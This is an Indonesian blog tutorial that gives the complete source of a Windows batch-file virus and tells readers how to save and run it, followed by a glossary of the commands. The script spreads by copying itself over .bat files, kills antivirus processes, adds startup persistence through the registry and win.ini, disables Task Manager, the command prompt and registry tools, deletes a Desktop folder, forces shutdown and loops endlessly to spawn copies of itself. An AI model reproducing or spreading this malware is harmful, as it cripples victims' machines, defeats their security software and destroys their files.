Berikut adalah contoh Virus bat
Pertama situ buka notepad
Kedua situ copy code bikinan ane ke notepad
@echo off
copy %0 %systemroot%\namavirus.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Explorer.exe /t REG_SZ /d %systemroot%\namavirus.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Antz /t REG_SZ /d C:\Windows\Antz.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d toepan.tk /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d Bukannya ane iseng gan cuman gg ada kerjaan aja /f
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\namavirus.bat >> %systemroot%\win.ini
echo run=%systemroot%\namavirus.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”sorry gan komputernya mati dulu.. ok”
cls
:hell
start %0
goto hell
Ketiga klik file>save as ganti save files type nya jadi all files.
Keempat save dengan nama “namavirus.bat” tanpa kutip
nah sekarang apakah Anda berani menjalankannya ??? =)) =)) =))
nah berikut notasinya supaya pada ngerti command nya…
@echo off = untuk menghilangkan tampilan command2 yg digunakan ingat ini harus digunakan di awal pengcodean
copy = mengcopy file ke dir tertentu
attrib = mengganti attribute file
cls = membersihkan command2 yg sudah diketik
tskill = mematikan process tertentu ngetiknya harus tanpa ekstensi
reg add = menambahkan registry sesuai yang anda mau
echo = menampilkan command
del = gg tw sama dengan leecher
shutdown = sama kayak diatas
msg = menampilkan pesan
:hell = menentukan save point
goto = kembali ke save point
nice tutor om deads32
sumber : disini
No comments:
Post a Comment